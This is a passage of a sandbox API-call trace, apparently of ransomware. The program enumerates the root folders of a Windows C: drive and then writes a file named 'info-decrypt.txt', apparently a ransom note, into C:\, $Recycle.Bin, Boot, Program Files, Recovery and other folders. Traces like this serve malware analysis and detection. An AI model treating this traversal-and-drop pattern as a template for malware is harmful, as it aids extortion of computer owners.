nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0093.186] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0093.186] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0093.186] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0093.186] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0093.186] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0093.187] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0093.187] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.187] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb70) returned 1 [0093.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb7c) returned 1 [0093.191] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.txt", lpFilePart=0x0) returned 0x13 [0093.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.191] CreateFileW (lpFileName="C:\\info-decrypt.txt" (normalized: "c:\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.194] GetFileType (hFile=0x2d4) returned 0x1 [0093.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.194] GetFileType (hFile=0x2d4) returned 0x1 [0093.195] WriteFile (in: hFile=0x2d4, lpBuffer=0x34f1594*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x34f1594*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.195] CloseHandle (hObject=0x2d4) returned 1 [0093.197] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\info-decrypt.txt", lpFilePart=0x0) returned 0x20 [0093.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.197] CreateFileW (lpFileName="C:\\$Recycle.Bin\\info-decrypt.txt" (normalized: "c:\\$recycle.bin\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.200] GetFileType (hFile=0x2d4) returned 0x1 [0093.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.200] GetFileType (hFile=0x2d4) returned 0x1 [0093.200] WriteFile (in: hFile=0x2d4, lpBuffer=0x34f3b7c*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x34f3b7c*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.201] CloseHandle (hObject=0x2d4) returned 1 [0093.202] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.txt", lpFilePart=0x0) returned 0x13 [0093.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.202] CreateFileW (lpFileName="C:\\info-decrypt.txt" (normalized: "c:\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.202] GetFileType (hFile=0x2d4) returned 0x1 [0093.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.202] GetFileType (hFile=0x2d4) returned 0x1 [0093.202] WriteFile (in: hFile=0x2d4, lpBuffer=0x34f6104*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x34f6104*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.203] CloseHandle (hObject=0x2d4) returned 1 [0093.204] GetFullPathNameW (in: lpFileName="C:\\Boot\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\info-decrypt.txt", lpFilePart=0x0) returned 0x18 [0093.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.204] CreateFileW (lpFileName="C:\\Boot\\info-decrypt.txt" (normalized: "c:\\boot\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.204] GetFileType (hFile=0x2d4) returned 0x1 [0093.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.204] GetFileType (hFile=0x2d4) returned 0x1 [0093.205] WriteFile (in: hFile=0x2d4, lpBuffer=0x34f86bc*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x34f86bc*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.206] CloseHandle (hObject=0x2d4) returned 1 [0093.206] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.txt", lpFilePart=0x0) returned 0x13 [0093.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.206] CreateFileW (lpFileName="C:\\info-decrypt.txt" (normalized: "c:\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.207] GetFileType (hFile=0x2d4) returned 0x1 [0093.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.207] GetFileType (hFile=0x2d4) returned 0x1 [0093.207] WriteFile (in: hFile=0x2d4, lpBuffer=0x34fac44*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x34fac44*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.212] CloseHandle (hObject=0x2d4) returned 1 [0093.212] GetFullPathNameW (in: lpFileName="C:\\Config.Msi\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi\\info-decrypt.txt", lpFilePart=0x0) returned 0x1e [0093.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.212] CreateFileW (lpFileName="C:\\Config.Msi\\info-decrypt.txt" (normalized: "c:\\config.msi\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.213] GetFileType (hFile=0x2d4) returned 0x1 [0093.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.213] GetFileType (hFile=0x2d4) returned 0x1 [0093.213] WriteFile (in: hFile=0x2d4, lpBuffer=0x34fd220*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x34fd220*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.214] CloseHandle (hObject=0x2d4) returned 1 [0093.214] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.txt", lpFilePart=0x0) returned 0x13 [0093.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.214] CreateFileW (lpFileName="C:\\info-decrypt.txt" (normalized: "c:\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.215] GetFileType (hFile=0x2d4) returned 0x1 [0093.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.216] GetFileType (hFile=0x2d4) returned 0x1 [0093.216] WriteFile (in: hFile=0x2d4, lpBuffer=0x34ff7a8*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x34ff7a8*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.217] CloseHandle (hObject=0x2d4) returned 1 [0093.217] GetFullPathNameW (in: lpFileName="C:\\Documents and Settings\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\Documents and Settings\\info-decrypt.txt", lpFilePart=0x0) returned 0x2a [0093.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.217] CreateFileW (lpFileName="C:\\Documents and Settings\\info-decrypt.txt" (normalized: "c:\\documents and settings\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.218] GetFileType (hFile=0x2d4) returned 0x1 [0093.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.218] GetFileType (hFile=0x2d4) returned 0x1 [0093.218] WriteFile (in: hFile=0x2d4, lpBuffer=0x3501dcc*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x3501dcc*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.219] CloseHandle (hObject=0x2d4) returned 1 [0093.219] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.txt", lpFilePart=0x0) returned 0x13 [0093.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.219] CreateFileW (lpFileName="C:\\info-decrypt.txt" (normalized: "c:\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.220] GetFileType (hFile=0x2d4) returned 0x1 [0093.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.220] GetFileType (hFile=0x2d4) returned 0x1 [0093.220] WriteFile (in: hFile=0x2d4, lpBuffer=0x3504354*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x3504354*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.221] CloseHandle (hObject=0x2d4) returned 1 [0093.222] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\info-decrypt.txt", lpFilePart=0x0) returned 0x1c [0093.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.222] CreateFileW (lpFileName="C:\\MSOCache\\info-decrypt.txt" (normalized: "c:\\msocache\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.224] GetFileType (hFile=0x2d4) returned 0x1 [0093.224] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.224] GetFileType (hFile=0x2d4) returned 0x1 [0093.224] WriteFile (in: hFile=0x2d4, lpBuffer=0x3506924*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x3506924*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.225] CloseHandle (hObject=0x2d4) returned 1 [0093.226] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.txt", lpFilePart=0x0) returned 0x13 [0093.226] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.226] CreateFileW (lpFileName="C:\\info-decrypt.txt" (normalized: "c:\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.227] GetFileType (hFile=0x2d4) returned 0x1 [0093.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.227] GetFileType (hFile=0x2d4) returned 0x1 [0093.227] WriteFile (in: hFile=0x2d4, lpBuffer=0x3508eac*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x3508eac*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.228] CloseHandle (hObject=0x2d4) returned 1 [0093.228] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\info-decrypt.txt", lpFilePart=0x0) returned 0x1c [0093.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.228] CreateFileW (lpFileName="C:\\PerfLogs\\info-decrypt.txt" (normalized: "c:\\perflogs\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.229] GetFileType (hFile=0x2d4) returned 0x1 [0093.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.229] GetFileType (hFile=0x2d4) returned 0x1 [0093.229] WriteFile (in: hFile=0x2d4, lpBuffer=0x350b47c*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x350b47c*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.229] CloseHandle (hObject=0x2d4) returned 1 [0093.230] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.txt", lpFilePart=0x0) returned 0x13 [0093.230] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.230] CreateFileW (lpFileName="C:\\info-decrypt.txt" (normalized: "c:\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.231] GetFileType (hFile=0x2d4) returned 0x1 [0093.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.231] GetFileType (hFile=0x2d4) returned 0x1 [0093.231] WriteFile (in: hFile=0x2d4, lpBuffer=0x350da04*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x350da04*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.232] CloseHandle (hObject=0x2d4) returned 1 [0093.233] GetFullPathNameW (in: lpFileName="C:\\Program Files\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\info-decrypt.txt", lpFilePart=0x0) returned 0x21 [0093.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.233] CreateFileW (lpFileName="C:\\Program Files\\info-decrypt.txt" (normalized: "c:\\program files\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.233] GetFileType (hFile=0x2d4) returned 0x1 [0093.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.233] GetFileType (hFile=0x2d4) returned 0x1 [0093.234] WriteFile (in: hFile=0x2d4, lpBuffer=0x350fff0*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x350fff0*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.235] CloseHandle (hObject=0x2d4) returned 1 [0093.235] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.txt", lpFilePart=0x0) returned 0x13 [0093.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.235] CreateFileW (lpFileName="C:\\info-decrypt.txt" (normalized: "c:\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.236] GetFileType (hFile=0x2d4) returned 0x1 [0093.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.236] GetFileType (hFile=0x2d4) returned 0x1 [0093.237] WriteFile (in: hFile=0x2d4, lpBuffer=0x3512578*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x3512578*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.238] CloseHandle (hObject=0x2d4) returned 1 [0093.238] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\info-decrypt.txt", lpFilePart=0x0) returned 0x27 [0093.238] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.238] CreateFileW (lpFileName="C:\\Program Files (x86)\\info-decrypt.txt" (normalized: "c:\\program files (x86)\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.238] GetFileType (hFile=0x2d4) returned 0x1 [0093.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.239] GetFileType (hFile=0x2d4) returned 0x1 [0093.239] WriteFile (in: hFile=0x2d4, lpBuffer=0x3514b88*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x3514b88*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.239] CloseHandle (hObject=0x2d4) returned 1 [0093.239] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.txt", lpFilePart=0x0) returned 0x13 [0093.239] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.239] CreateFileW (lpFileName="C:\\info-decrypt.txt" (normalized: "c:\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.240] GetFileType (hFile=0x2d4) returned 0x1 [0093.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.241] GetFileType (hFile=0x2d4) returned 0x1 [0093.241] WriteFile (in: hFile=0x2d4, lpBuffer=0x3517110*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x3517110*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.242] CloseHandle (hObject=0x2d4) returned 1 [0093.242] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\info-decrypt.txt", lpFilePart=0x0) returned 0x1f [0093.242] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.242] CreateFileW (lpFileName="C:\\ProgramData\\info-decrypt.txt" (normalized: "c:\\programdata\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.243] GetFileType (hFile=0x2d4) returned 0x1 [0093.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.243] GetFileType (hFile=0x2d4) returned 0x1 [0093.243] WriteFile (in: hFile=0x2d4, lpBuffer=0x35196f0*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x35196f0*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.244] CloseHandle (hObject=0x2d4) returned 1 [0093.244] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.txt", lpFilePart=0x0) returned 0x13 [0093.245] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.245] CreateFileW (lpFileName="C:\\info-decrypt.txt" (normalized: "c:\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.246] GetFileType (hFile=0x2d4) returned 0x1 [0093.246] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.246] GetFileType (hFile=0x2d4) returned 0x1 [0093.246] WriteFile (in: hFile=0x2d4, lpBuffer=0x351bc78*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x351bc78*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.246] CloseHandle (hObject=0x2d4) returned 1 [0093.247] GetFullPathNameW (in: lpFileName="C:\\Recovery\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\info-decrypt.txt", lpFilePart=0x0) returned 0x1c [0093.247] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.247] CreateFileW (lpFileName="C:\\Recovery\\info-decrypt.txt" (normalized: "c:\\recovery\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.248] GetFileType (hFile=0x2d4) returned 0x1 [0093.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.248] GetFileType (hFile=0x2d4) returned 0x1 [0093.248] WriteFile (in: hFile=0x2d4, lpBuffer=0x351e248*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x351e248*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.250] CloseHandle (hObject=0x2d4) returned 1 [0093.250] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.txt", lpFilePart=0x0) returned 0x13 [0093.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.250] CreateFileW (lpFileName="C:\\info-decrypt.txt" (normalized: "c:\\info-decrypt.txt"), 